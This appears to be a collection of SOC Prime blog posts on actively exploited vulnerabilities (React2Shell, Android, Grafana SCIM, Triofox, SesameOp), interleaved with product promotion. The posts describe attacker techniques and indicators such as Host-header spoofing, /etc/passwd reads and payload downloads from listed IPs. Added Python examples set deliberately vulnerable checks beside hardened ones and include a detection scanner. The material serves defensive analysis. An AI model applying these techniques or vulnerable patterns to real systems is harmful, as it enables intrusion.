
React2Shell Vulnerability: Maximum-Severity Flaw in React Server Components Actively Exploited by China-Backed Groups 

5 December 2025, 12:49
React2Shell Vulnerability

A new maximum-severity flaw (with a CVSS score of 10.0) in React Server Components (RSC), dubbed React2Shell, is causing a stir in the cyber threat landscape, hot on the heels of the recent exploitation of two high-severity Android Framework vulnerabilities (CVE-2025-48633 and CVE-2025-48572). Defenders have observed multiple Chinese nation-backed groups exploiting the React2Shell vulnerability, which enables RCE and puts vulnerable deployments at significant risk.

For years, China has conducted offensive cyber operations targeting U.S. and international organizations across various sectors, often leveraging nation-state-linked APT groups such as Mustang Panda or APT41 to collect intelligence and sensitive data. 

For a half-decade, China’s nation-backed cyber operations have increasingly emphasized stealth and operational security, creating a more complex and challenging threat landscape for organizations across industries, including the public sector, as well as for the global cybersecurity community. China-linked APT groups remain the fastest and most active state-sponsored actors, often weaponizing new exploits almost immediately after disclosure. The CrowdStrike 2025 Global Threat Report indicates that China-linked threat actors increased state-sponsored cyber operations by 150%.

Register for the SOC Prime Platform, the AI-Native Detection Intelligence Platform for SOC teams to help your organization preempt emerging threats of any sophistication, advanced APT attacks, and evolving vulnerability exploitation campaigns. Click Explore Detections to access a comprehensive collection of SOC content for vulnerability exploitation, smartly filtered by a custom “CVE” tag.

Explore Detections

All detections can be applied across diverse SIEM, EDR, and Data Lake systems and are mapped to the MITRE ATT&CK® framework. They are also enriched with AI-native detection intelligence and actionable metadata, including CTI references, attack timelines, audit configuration, triage recommendations for a streamlined threat research and CTI analysis, helping teams boost operational efficiency.

Security teams can also rely on Uncoder AI to accelerate detection engineering workflows end-to-end and take advantage of automated IOC conversion into custom hunting queries, automated detection logic generation directly from threat reports, Attack Flow visualization, ATT&CK tags prediction, and AI-assisted content across multiple language formats—all within a single solution. 

React2Shell Vulnerability Analysis

Defenders recently uncovered a novel maximum-severity vulnerability in React Server Components tracked as CVE-2025-55182, aka React2Shell, which affects React 19.x and Next.js 15.x/16.x with App Router. This pre-authentication RCE flaw was responsibly reported to Meta by Lachlan Davidson, with React and Vercel jointly issuing patches on December 3, 2025. Public PoC exploits surfaced roughly 30 hours after disclosure, followed shortly by the researcher’s own PoCs. 

React2Shell arises from unsafe deserialization of payloads sent via HTTP requests to Server Function endpoints. This logical deserialization flaw in processing RSC payloads allows an unauthenticated attacker to send a crafted HTTP request to any Server Function endpoint, which React then deserializes, enabling execution of arbitrary JavaScript code on the server.

Amazon threat intel teams report that China-linked state-sponsored collectives, both established and previously unknown clusters, including Earth Lamia and Jackpot Panda, are already attempting to weaponize the flaw, which enables unauthenticated RCE through unsafe handling of RSC payloads. 

Adversaries are leveraging both automated scanners and manually executed PoCs, with some tools using evasion tactics like randomized user agents. Their activity extends well beyond CVE-2025-55182, with Amazon’s monitoring showing the same Chinese clusters exploiting other recent vulnerabilities, such as CVE-2025-1338. This underscores a systematic model, in which adversaries track new disclosures, immediately fold public exploits into their tooling, and launch broad campaigns across multiple CVEs at once to maximize target reach.

Notably, many adversaries rely on publicly posted PoCs that do not function in real deployments. The GitHub community has flagged numerous examples that misinterpret the vulnerability, including demos that improperly register dangerous modules or remain exploitable even after patching. Yet attackers continue to use them, highlighting clear behavioral trends, like rapid adoption over validation, high-volume scanning, low barriers to entry due to public exploit availability, and log noise that can obscure more targeted attacks.

AWS MadPot telemetry confirms that adversaries are persistently iterating on their exploitation attempts. The unattributed cluster (IP 183[.]6.80.214) spent nearly an hour on December 4 repeatedly testing payloads, issuing 100+ requests over 52 minutes, running Linux commands, attempting file writes to /tmp/pwned.txt, and trying to read /etc/passwd. This demonstrates that attackers are not simply firing off automated scans but are actively debugging and refining techniques against live systems.

Notably, the threat also impacts Next.js applications using App Router. Originally assigned CVE-2025-66478 with a CVSS score of 10.0, it has since been marked by the NIST NVD as a duplicate of the React2Shell vulnerability.

Wiz reported that 39% of cloud environments have systems susceptible to CVE-2025-55182 and CVE-2025-66478. Although AWS services are not impacted, given the critical nature of both vulnerabilities, users are strongly urged to apply patches immediately to ensure maximum protection.

Organizations running React or Next.js on EC2, in containers, or in other self-managed environments should apply updates without delay. To minimize risks from React2Shell exploitation, immediately update affected React and Next.js applications following the AWS Security Bulletin for patched versions. As an interim measure, defenders are recommended to deploy the custom AWS WAF rule provided in the bulletin to block exploit attempts. 

Meanwhile, Cloudflare announced that it has implemented a new protection in its cloud-based WAF as a potential React2Shell mitigation step. According to the company, all customers, both free and paid, are safeguarded, provided their React application traffic is routed through Cloudflare’s proxy.

As the number of vulnerabilities actively exploited continues to rise, forward-looking organizations are prioritizing proactive cyber defenses to ensure strong and resilient security postures. SOC Prime’s AI-Native Detection Intelligence Platform helps organizations elevate their cyber defenses at scale by empowering AI technologies and top cybersecurity expertise while maximizing resource effectiveness.



The post React2Shell Vulnerability: Maximum-Severity Flaw in React Server Components Actively Exploited by China-Backed Groups  appeared first on SOC Prime.

CVE-2025-48633 and CVE-2025-48572: Android Framework Information Disclosure and Privilege Escalation Vulnerabilities Exploited in the Wild

4 December 2025, 09:01
CVE-2025-48633 and CVE-2025-48572 Vulnerabilities

Following the early-November disclosure of CVE-2025-48593, a critical zero-click flaw in the Android System component, two further vulnerabilities in the Android Framework have come into the spotlight due to their active exploitation, posing emerging risks to global organizations potentially affected by the threat.

The two newly uncovered flaws within the Android Framework include high-severity vulnerabilities tracked as CVE-2025-48633 and CVE-2025-48572. Google has instantly responded to the threat by addressing these vulnerabilities in its monthly security updates. However, the vendor has not yet provided further insight into how these vulnerabilities are being leveraged in the wild, whether adversaries are chaining them or exploiting them independently, or the overall scope of the malicious activity.

As of November 30, the number of reported CVEs has surpassed 42,000, marking a 16.9% increase compared to 2024. The pace remains high, with an average of 128 newly disclosed vulnerabilities each day. These patterns underscore the continued urgency for proactive defense and the growing need for real-time delivery of threat detection content, enabling defenders to spot and mitigate new risks before they gain traction.

Register today for the SOC Prime Platform, the industry’s leading vendor-agnostic suite designed for real-time defense. It offers the full pipeline from detection to simulation and features the world’s largest detection intelligence dataset, with emerging threats updated daily to help organizations stay ahead of the curve. Use the Explore Detections button to view context-enriched SOC content for vulnerability exploitation, conveniently filtered by a dedicated “CVE” tag.

Explore Detections

Detection logic is compatible with dozens of leading SIEM, EDR, and Data Lake technologies and is aligned with the MITRE ATT&CK® framework for consistent threat mapping. Each detection algorithm is enhanced with AI-native detection intelligence and comprehensive metadata, including CTI references, attack timelines, audit configuration, triage recommendations, and more actionable threat context.

Security teams can further leverage Uncoder AI to streamline detection engineering by converting IOCs into custom hunting queries, generating detection logic directly from threat reports, visualizing Attack Flow diagrams, predicting ATT&CK tags, translating content across multiple formats, and automating a wide range of daily workflows end-to-end. 

CVE-2025-48633 and CVE-2025-48572 Analysis

Google has recently issued its December 2025 Android Security Bulletin, resolving 100+ vulnerabilities across multiple components, including the Framework, System, Kernel, and third-party hardware drivers. The vendor confirmed that two of these flaws, CVE-2025-48633, an information disclosure issue, and CVE-2025-48572, a privilege escalation flaw, have been exploited in real-world attacks and may be subject to limited, targeted abuse. The December bulletin includes two patch levels to help device manufacturers deploy shared fixes more rapidly.

On December 2, 2025, CISA added CVE-2025-48633 and CVE-2025-48572 to its Known Exploited Vulnerabilities catalog, mandating that U.S. federal agencies patch them by December 23, 2025, due to the significant risk they pose.

Security enhancements in modern Android versions significantly reduce the likelihood of successful exploitation. As feasible CVE-2025-48633 and CVE-2025-48572 mitigation steps, users should update their devices to the latest Android release and promptly apply security patches. In addition, Google Play Protect, enabled by default, helps detect and block harmful apps, particularly critical for those customers who install software from outside Google Play.

With the constantly increasing volumes of vulnerabilities exploited in the wild, proactive cyber defense measures are becoming a top priority for progressive organizations concerned about maintaining robust cyber resilience. By leveraging SOC Prime’s AI-native detection intelligence platform built for real-time defense, security teams can take their enterprise security protection to the next level and strengthen the organization’s cybersecurity posture.


CVE-2025-41115: A Maximum-Severity Privilege Escalation Vulnerability in the Grafana SCIM Component 

24 November 2025, 08:24
CVE-2025-41115 Vulnerability

Following the early November reveal of CVE-2025-48593, a critical RCE issue in the Android System component, another maximum-severity vulnerability is causing a stir in the cyber threat landscape. The newly identified Grafana flaw, tracked as CVE-2025-41115, could enable privilege escalation or user impersonation in specific configurations. 

Grafana, as a popular open-source analytics platform, has been abused for offensive purposes throughout the last half-decade, posing a threat to its global users. For instance, in mid-June 2025, researchers uncovered an XSS vulnerability in Grafana, CVE-2025-4123, enabling adversaries to execute malicious plugins and compromise user accounts without requiring elevated permissions. 

Such vulnerabilities underscore the growing volume of security issues impacting open-source ecosystems. The 2025 Open Source Security and Risk Analysis (OSSRA) report revealed that 86% of reviewed applications contained vulnerable open-source components, and 81% included flaws rated high or critical. These trends reinforce the ongoing need for proactive vigilance and real-time threat detection content, ensuring defenders can identify and mitigate emerging risks before they escalate.

Register now for the SOC Prime Platform, the industry-leading vendor-agnostic product suite built for real-time defenders, to discover a broad collection of curated detection content and AI-native threat intelligence, helping security teams stay ahead of attackers. Click Explore Detections to get access to context-enriched SOC content for vulnerability exploit detection filtered by the corresponding custom “CVE” tag.

Explore Detections

Detection algorithms can be applied across dozens of widely adopted SIEM, EDR, and Data Lake solutions and are aligned with the MITRE ATT&CK® framework. Additionally, each rule is enriched with AI-native threat intel, including CTI links, attack timelines, audit configurations, triage recommendations, and other in-depth metadata.

Security teams can also take advantage of Uncoder AI to instantly convert IOCs into custom hunting queries, generate detection code from raw threat reports, visualize Attack Flow diagrams, enable ATT&CK tags prediction, translate detection content across multiple formats, and perform other daily detection engineering tasks end-to-end. 

CVE-2025-41115 Analysis

Grafana has recently rolled out updated builds of Grafana Enterprise 12.3, along with refreshed versions 12.2.1, 12.1.3, and 12.0.6, each addressing a newly discovered maximum-severity vulnerability (CVE-2025-41115). The issue was discovered during an internal audit on November 4, 2025. The flaw has the highest possible CVSS score of 10.0 and affects the SCIM (System for Cross-domain Identity Management) feature, introduced in mid-spring 2025 and currently in public preview.

The issue appears in Grafana 12.x when SCIM provisioning is both enabled and configured. A malicious or compromised SCIM client can provision a user with a numeric externalId, potentially overriding internal user IDs and enabling impersonation, even of an admin account, or escalating privileges.

Exploitation requires both the enableSCIM feature flag and the user_sync_enabled option in the [auth.scim] configuration block to be enabled.

The vulnerability impacts Grafana Enterprise versions 12.0.0 through 12.2.1. Because Grafana directly maps the SCIM externalId to its internal user.uid, numeric values can be misinterpreted as existing user IDs. In specific cases, this could cause a newly created user to be treated as an internal account with elevated privileges.

Grafana promptly released patches as urgent CVE-2025-41115 mitigation measures. Due to the vulnerability’s severity, organizations are strongly encouraged to update immediately to reduce the risk of attacks. Rely on the SOC Prime Platform, which curates the world’s largest detection intelligence dataset and constantly updated detection content against emerging threats, to reinforce your organization’s cybersecurity posture and preempt the cyber attacks that matter most.
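The identifier-collision pattern behind CVE-2025-41115, as an added example that is not Grafana’s code: a toy SCIM provisioning routine that maps the client-supplied externalId straight onto the internal user uid (the behaviour described above) beside a hardened variant that refuses numeric externalIds and keeps SCIM identities in their own namespace. The in-memory user store, the `scim:` prefix and the exact hardening are assumptions for illustration, not Grafana’s actual patch.

```python
"""Toy model of SCIM externalId -> internal uid mapping (CVE-2025-41115).

Added example, not Grafana's code. The user table, the ProvisioningError
type and the hardening strategy are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Anything an integer parser would accept as a numeric user ID.
NUMERIC_ID = re.compile(r"[+-]?\d+")


@dataclass
class User:
    uid: str
    login: str
    is_admin: bool


class ProvisioningError(ValueError):
    """Raised when a SCIM payload is rejected by the hardened path."""


# Constructed internal user table with Grafana-style numeric internal IDs.
INTERNAL_USERS = {
    "1": User(uid="1", login="admin", is_admin=True),
    "2": User(uid="2", login="viewer", is_admin=False),
}


def provision_user_unsafe(users, scim_payload):
    """Vulnerable pattern: the externalId becomes the internal uid.

    A SCIM client sending externalId="1" resolves to the existing admin
    record instead of producing a fresh, unprivileged user.
    """
    uid = scim_payload["externalId"]
    if uid in users:
        return users[uid]  # impersonation: caller gets the admin account
    users[uid] = User(uid=uid, login=scim_payload["userName"], is_admin=False)
    return users[uid]


def provision_user_hardened(users, scim_payload):
    """Assumed fix (not Grafana's actual patch):

    * reject externalIds that parse as integers, so they can never alias an
      internal numeric uid;
    * namespace SCIM identities so the two identifier spaces cannot overlap
      even if the format check is relaxed later;
    * never resolve an existing internal record through a SCIM externalId.
    """
    external_id = (scim_payload.get("externalId") or "").strip()
    if not external_id or NUMERIC_ID.fullmatch(external_id):
        raise ProvisioningError("externalId must not be numeric")
    uid = f"scim:{external_id}"
    if uid in users:
        raise ProvisioningError("duplicate SCIM identity")
    users[uid] = User(uid=uid, login=scim_payload["userName"], is_admin=False)
    return users[uid]


def demo():
    """Run the constructed malicious payload through both paths."""
    malicious = {"externalId": "1", "userName": "attacker"}
    unsafe = provision_user_unsafe(dict(INTERNAL_USERS), malicious)
    try:
        provision_user_hardened(dict(INTERNAL_USERS), malicious)
        hardened = "provisioned"
    except ProvisioningError as exc:
        hardened = str(exc)
    return unsafe.login, unsafe.is_admin, hardened


if __name__ == "__main__":
    print(demo())
```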


CVE-2025-12480 Detection: Hackers Exploit the Now-Patched Unauthenticated Access Control Vulnerability in Gladinet’s Triofox 

11 November 2025, 13:20
CVE-2025-12480 Detection

Following the disclosure of CVE-2024-1086, a Linux kernel privilege escalation flaw actively exploited in ransomware campaigns, another critical vulnerability has emerged, allowing attackers to bypass authentication and conduct further malicious operations. 

In 2025, Gladinet came under the crosshairs of threat actors, flagged for critical vulnerabilities in its products actively exploited in the wild. A zero-day in Gladinet CentreStack and Triofox (CVE-2025-30406) allowed remote code execution via flawed cryptographic key management. Later, CVE-2025-11371 was observed on patched instances, letting attackers retrieve machine keys from Web.config and forge ViewState payloads that bypass integrity checks, triggering unsafe server-side deserialization and remote code execution via the earlier flaw. 

Most recently, Google’s Mandiant researchers spotted a third critical Triofox vulnerability (CVE-2025-12480), which lets attackers bypass authentication to create admin accounts and deploy remote access tools using the platform’s antivirus feature.

Detect CVE-2025-12480 Exploitation Attempts

Cybercriminals are increasingly exploiting vulnerabilities as a primary gateway into systems. ENISA’s Threat Landscape 2025 report shows that exploitation accounted for over one-fifth (21.3%) of initial access vectors, with 68% of these incidents followed by malware deployment. Combined with over 42,000 new vulnerabilities recorded by NIST this year, the trends illustrate a relentless pressure on cybersecurity teams. Every unpatched system is a potential entry point, making early detection essential to prevent large-scale compromise.

The recently identified CVE-2025-12480 vulnerability in Gladinet’s Triofox highlights this growing threat, underscoring the importance of proactive defenses to stay ahead of modern attacks. 

Register now for the SOC Prime Platform to access an extensive collection of curated detection content and AI-native threat intelligence, helping your team outscale offensive campaigns exploiting CVE-2025-12480. Press the Explore Detections button below to dive directly into a relevant detection stack.

Explore Detections

Also, you can use the “UNC6485” tag to search for more content addressing adversary TTPs related to the threat cluster activity behind these attacks. For a broader range of SOC content for vulnerability exploit detection, security engineers can also apply the “CVE” tag.

All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms. For instance, cyber defenders can generate the Attack Flow diagram based on Google Mandiant’s latest research in seconds.

Use Uncoder AI to visualize the CVE-2025-12480 exploitation attack flow covered in Google Mandiant's report.

CVE-2025-12480 Analysis

On November 10, 2025, Google’s Mandiant Threat Defense published an in-depth analysis of CVE-2025-12480 (CVSS score 9.1), a zero-day vulnerability in Gladinet’s Triofox file-sharing and remote access platform. The vulnerability was actively weaponized by the hacking group tracked as UNC6485 as far back as August 24, 2025, allowing attackers to bypass authentication and execute malicious code with system-level privileges.

Mandiant researchers reported that UNC6485 exploited the CVE-2025-12480 vulnerability in Triofox to reach protected configuration pages. Using these pages, attackers created a native admin account named Cluster Admin through the setup process. This new account was then leveraged to upload and execute malicious files via the platform’s antivirus feature.

The antivirus feature allows users to specify an arbitrary path for the selected antivirus. Since this configured process runs under the SYSTEM account, attackers could execute arbitrary scripts with full system privileges. In this case, adversaries used the batch script centre_report.bat, which downloaded a Zoho Unified Endpoint Management System (UEMS) installer from 84.200.80[.]252 and deployed remote access tools like Zoho Assist and AnyDesk.

The attack began with a clever manipulation of HTTP Host headers. By setting the Host header to "localhost", attackers abused the CanRunCriticalPage() function, which improperly trusted the HTTP Host header without verifying the request origin. This allowed remote access to pages that should have been restricted, effectively spoofing the attackers’ source IP address. Once access was gained, attackers used the Cluster Admin account to execute malicious scripts via the antivirus configuration path.
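The access-control mistake described above, as an added example that is not Triofox’s code: a check that trusts the client-controlled Host header beside a hardened check that decides on the TCP peer address, plus a defender-side audit that flags requests whose Host claims localhost while the connection came from elsewhere. The `Request` shape, the function names and the sample requests are constructed for illustration.

```python
"""Host-header trust versus connection-origin checks (CVE-2025-12480 pattern).

Added example, not Triofox's code. The Request class, function names and
sample traffic are constructed; only the failure mode mirrors the report.
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Request:
    remote_addr: str                      # TCP peer as seen by the server
    headers: dict = field(default_factory=dict)

    def header(self, name):
        """Case-insensitive header lookup; returns None when absent."""
        return next((v for k, v in self.headers.items()
                     if k.lower() == name.lower()), None)


def host_name(req):
    """Host header without any port suffix, lower-cased."""
    return (req.header("Host") or "").split(":", 1)[0].lower()


def can_run_critical_page_vulnerable(req):
    """Pattern the report describes: any remote client reaches the setup
    pages simply by sending a Host header that claims to be localhost."""
    return host_name(req) in ("localhost", "127.0.0.1")


def can_run_critical_page_hardened(req):
    """Assumed fix: only the real peer address decides; the Host header is
    ignored because the client controls it. Behind a reverse proxy this
    must instead trust only the proxy's own forwarded-for value, never one
    supplied by the client."""
    try:
        peer = ipaddress.ip_address(req.remote_addr)
    except ValueError:
        return False
    return peer.is_loopback


def audit_requests(requests):
    """Defender view: return peer addresses that claimed a localhost Host
    header without actually connecting from loopback."""
    return [req.remote_addr for req in requests
            if host_name(req) in ("localhost", "127.0.0.1")
            and not can_run_critical_page_hardened(req)]


# Constructed sample traffic (RFC 5737 documentation address for the remote peer).
SAMPLE = [
    Request("127.0.0.1", {"Host": "localhost"}),             # genuine local setup
    Request("203.0.113.7", {"Host": "localhost:443"}),       # spoofed Host from outside
    Request("203.0.113.7", {"Host": "files.example.test"}),  # ordinary remote request
]

if __name__ == "__main__":
    for req in SAMPLE:
        print(req.remote_addr, host_name(req),
              can_run_critical_page_vulnerable(req),
              can_run_critical_page_hardened(req))
    print("suspicious peers:", audit_requests(SAMPLE))
```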

To evade detection, UNC6485 downloaded tools such as Plink and PuTTY to establish an encrypted SSH tunnel to a command-and-control (C2) server over port 433, ultimately enabling inbound RDP traffic for persistent remote access.

The vulnerability affected Triofox v16.4.10317.56372 and has been fixed in v16.7.10368.56560. Users are strongly urged to upgrade to the patched version immediately. Mitigation steps for CVE-2025-12480 also include auditing all administrator accounts for unauthorized entries, reviewing and verifying antivirus configurations, and monitoring for unusual outbound SSH traffic to detect any ongoing compromises. Also, to stay ahead of attackers and proactively detect potential vulnerability exploitation attempts, security teams can rely on SOC Prime’s complete product suite backed by AI, automation capabilities, and real-time threat intel, while strengthening the organization’s defenses at scale.


CVE-2025-48593: Critical Zero-Click Vulnerability in Android Enables Remote Code Execution

5 November 2025, 11:25, by Veronika Telychko
CVE-2025-48593 Vulnerability

As the effects of CVE-2024-1086 continue to unfold, a new vulnerability has emerged, posing a menace to cyber defenders. Google has flagged a critical zero-click flaw in the Android System component responsible for managing essential device functions. CVE-2025-48593  allows attackers to execute malicious code remotely without any user interaction, potentially giving them full control over affected devices. If exploited, it could lead to data theft, ransomware deployment, or even the use of compromised smartphones as nodes in larger botnet attacks, making it one of the most urgent security risks for mobile users today.

Mobile devices have become indispensable in both personal and professional life. According to Verizon’s 2024 report, 80% of companies consider mobile devices critical to their operations, which makes them especially attractive targets for enterprise-grade cyber attackers in 2025. Many apps still contain security weaknesses, and threats such as zero-click exploits and advanced malware are on the rise, highlighting the urgent need for proactive security measures.

Sign up for the SOC Prime Platform to access the global active threats feed, which offers real-time cyber threat intelligence and curated detection algorithms to address emerging threats. All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context. Press Explore Detections to see the entire detection stack for proactive defense against critical vulnerabilities filtered by the “CVE” tag.

Explore Detections

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms.

CVE-2025-48593 Analysis

On November 3, 2025, Google released its November Android Security Bulletin, highlighting several major vulnerabilities in the Android System component. Among them, CVE-2025-48593 stands out as critical. This flaw allows attackers to execute malicious code remotely without requiring any user interaction or additional privileges, making it extremely dangerous for mobile users. 

According to Google, the vulnerability stems from insufficient validation of user input and affects Android versions 13 through 16. The flaw’s critical rating underscores its ease of exploitation and the potential for adversaries to gain unauthorized access to sensitive data, personal communications, and device resources.

Alongside this critical RCE vulnerability, Google also disclosed CVE-2025-48581, a high-severity elevation-of-privilege flaw that impacts Android 16 exclusively, allowing attackers to escalate privileges on affected devices.

These disclosures are part of Google’s coordinated vulnerability disclosure process, which notifies Android partners and device manufacturers at least one month before the public bulletin release. This timeline ensures manufacturers have sufficient time to develop, test, and distribute patches before vulnerabilities become widely known. Devices with a security patch level of 2025-11-01 or later include fixes for all vulnerabilities addressed in this bulletin. Source code patches are set to appear in the Android Open Source Project (AOSP) within 48 hours of the bulletin’s publication to ensure swift patch rollout.

As potential CVE-2025-48593 mitigation measures, users should check their device’s current security patch level through settings and install any available updates immediately. The fusion of zero-click exploitability and system-level control underscores the urgency of applying patches to safeguard sensitive data and preserve device security. 

The increasing volumes of RCE vulnerabilities uncovered in popular software products require ultra-resilience from defenders. By leveraging SOC Prime’s AI-Native Detection Intelligence Platform, organizations can anticipate, detect, validate, and respond to cyber threats faster and more effectively, while maximizing team productivity.


SesameOp Backdoor Detection: Microsoft Discovers New Malware Abusing OpenAI Assistants API in Cyber-Attacks

4 November 2025, 12:38
SesameOp Backdoor Detection

AI-driven cyber-attacks are rapidly reshaping the threat landscape for businesses, introducing a new level of sophistication and risk. Cybercriminals are increasingly using artificial intelligence to power financially motivated attacks, with cyber threats like FunLocker ransomware and Koske malware as the most recent examples. 

In a recent discovery, Microsoft’s Detection and Response Team (DART) identified a highly advanced backdoor that leverages the OpenAI Assistants API in a completely novel way—as a command-and-control (C2) communication channel. This method allows attackers to discreetly manage and coordinate malicious operations within infected systems, avoiding traditional security defenses. The discovery highlights how AI is being used in cybercrime, underscoring the need for businesses to remain vigilant and adapt their security strategies.

Detect SesameOp Backdoor Attacks

Organizations are entering a new era of cyber risk as attackers increasingly harness artificial intelligence to target critical business systems. Generative AI is not only creating new vulnerabilities but also enabling more sophisticated and adaptive attack methods. The Splunk State of Security 2025 Report finds that security leaders anticipate threat actors will use generative AI to make attacks more effective (32%), increase their frequency (28%), invent entirely new attack techniques (23%), and conduct detailed reconnaissance (17%). These trends underscore the urgent need for organizations to rethink cybersecurity strategies and adopt more intelligent, proactive defenses against AI-powered threats.

Register for the SOC Prime Platform to benefit from the defensive capabilities of AI and detect SesameOp backdoor attacks at the earliest stages of development. The Platform delivers timely threat intelligence and actionable detection content, backed by a complete product suite for real-time cyber defense. Click Explore Detections below to access detection rules specifically addressing SesameOp malware activity, or use the “SesameOp” tag in the Threat Detection Marketplace.

Explore Detections

All detections are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms. For instance, security professionals can use Microsoft’s DART research details to generate an Attack Flow diagram in several clicks.

Use Uncoder AI to visualize the SesameOp attack flow based on Microsoft’s recent research.

SesameOp Malware Attacks Analysis

Microsoft researchers have recently identified a novel backdoor dubbed SesameOp, distinguished by its innovative use of the OpenAI Assistants API for C2 operations. Unlike conventional methods, adversaries leveraged the OpenAI API as a covert communication channel to issue and manage commands within compromised environments. A component of the malware used the API as a relay mechanism to retrieve instructions and execute them on infected systems. The OpenAI Assistants API, used by the backdoor for C2 operations, lets developers embed AI-powered agents into applications and workflows. 

Discovered in July 2025 during Microsoft’s investigation of a long-term intrusion, SesameOp was found within a network where attackers had maintained persistence for several months. The analysis revealed a tricky structure of internal web shells linked to persistent malicious processes embedded in compromised Microsoft Visual Studio utilities via .NET AppDomainManager injection, a known defense evasion tactic.

Further hunting for similarly altered Visual Studio utilities uncovered additional components designed to support communication with the internal web shell network. One such component was identified as the new SesameOp malware. SesameOp is a custom backdoor built for long-term persistence, allowing attackers to stealthily control compromised systems, suggesting the operation’s main objective was prolonged espionage.

The infection chain includes a loader (Netapi64.dll) and a .NET backdoor (OpenAIAgent.Netapi64) that uses the OpenAI Assistants API as its C2 channel. The DLL, heavily obfuscated with Eazfuscator.NET, is built for stealth, persistence, and encrypted communication. At runtime, Netapi64.dll is injected into the host process via .NET AppDomainManager injection, triggered by a specially crafted .config file bundled with the host executable.

OpenAIAgent.Netapi64 houses the backdoor’s core functionality. Despite its name, it does not use OpenAI SDKs or run models locally; rather, it polls the OpenAI Assistants API to retrieve compressed, encrypted commands, decrypts and executes them on the host, and then returns the results as API messages. Compression and encryption are used to keep both incoming payloads and outgoing responses under the radar.

Malicious messages use three description types: SLEEP (pause the thread), Payload (extract instructions from the message and run them in a separate thread), and Result (return execution output to OpenAI with the description set to “Result”). Although the identities of the adversaries linked to the offensive campaign remain unknown, the case highlights the continued abuse of legitimate services to hide malicious activity. To raise awareness, Microsoft shared its findings with OpenAI, which disabled the suspected API key and account. OpenAI plans to deprecate this API in August 2026, replacing it with the new Responses API.
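The .config-driven AppDomainManager loading described above leaves a hunt-able artifact: a config beside a legitimate host executable that names a manager assembly. The scanner below is an added example, not Microsoft's or SOC Prime's code; it parses .config files with the standard library and flags <runtime> entries that name an AppDomainManager, and the sample configs, directory layout and assembly names are constructed placeholders.

```python
"""Hunt for .NET AppDomainManager injection configs (the SesameOp loader
technique). Added example; the configs below are constructed and the
manager assembly/type names are placeholders, not SesameOp's own."""
import os
import tempfile
import xml.etree.ElementTree as ET  # expat does not fetch external entities

# Elements the .NET Framework honours under <configuration><runtime>.
MANAGER_ELEMENTS = ("appDomainManagerAssembly", "appDomainManagerType")


def find_manager(xml_text):
    """Return {element: value} for AppDomainManager settings in a config,
    {} when none are present, or None when the text is not well-formed."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    found = {}
    for runtime in root.iter("runtime"):
        for elem in runtime:
            tag = elem.tag.rsplit("}", 1)[-1]  # tolerate namespaced children
            if tag in MANAGER_ELEMENTS:
                found[tag] = elem.get("value", "")
    return found


def inspect_config(path):
    """Describe one .config file, or return None when it names no manager.
    The manager assembly normally sits as a DLL next to the config; a DLL
    dropped beside a Microsoft-signed host binary is the pattern to triage."""
    try:
        with open(path, encoding="utf-8-sig") as fh:
            found = find_manager(fh.read())
    except OSError:
        return None
    if not found:
        return None
    assembly = found.get("appDomainManagerAssembly", "").split(",")[0].strip()
    dll = os.path.join(os.path.dirname(path), assembly + ".dll") if assembly else ""
    return {"config": path, "assembly": assembly,
            "type": found.get("appDomainManagerType", ""),
            "assembly_present": bool(dll) and os.path.isfile(dll)}


def hunt(root_dir):
    """Walk root_dir and return one record per .config that names a manager."""
    hits = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".config"):
                record = inspect_config(os.path.join(dirpath, name))
                if record:
                    hits.append(record)
    return hits


BENIGN_CONFIG = """<?xml version="1.0"?><configuration>
  <startup><supportedRuntime version="v4.0" /></startup></configuration>"""
# Constructed: manager assembly and type names are placeholders.
INJECTING_CONFIG = """<?xml version="1.0"?><configuration><runtime>
  <appDomainManagerAssembly value="ExampleManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
  <appDomainManagerType value="Example.Manager" />
</runtime></configuration>"""


def demo():
    """Build a constructed directory tree, hunt it, and return the hits."""
    with tempfile.TemporaryDirectory() as base:
        tools = os.path.join(base, "tools")
        os.makedirs(tools)
        with open(os.path.join(tools, "clean.exe.config"), "w") as fh:
            fh.write(BENIGN_CONFIG)
        with open(os.path.join(tools, "hosted.exe.config"), "w") as fh:
            fh.write(INJECTING_CONFIG)
        with open(os.path.join(tools, "ExampleManager.dll"), "wb") as fh:
            fh.write(b"MZ placeholder")  # stands in for the dropped assembly
        return hunt(base)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Legitimate software occasionally ships an AppDomainManager, so treat hits as triage candidates and check who signed the host binary and the named DLL.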

As potential mitigation steps to preempt SesameOp backdoor attacks, the vendor recommends regularly auditing firewalls and web server logs, securing all Internet-facing systems, and using endpoint and network protections to block C2 communications. It’s essential to ensure that tamper protection and real-time protection are enabled in Microsoft Defender, run endpoint detection in block mode, and configure automated investigation and remediation to quickly address the potential threat. Additionally, teams should enable cloud-delivered protection and block potentially unwanted applications to reduce the risk posed by evolving attacks. The growing use of cyber-attacks employing innovative methods and AI technology demands heightened vigilance from defenders to stay ahead of adversaries.

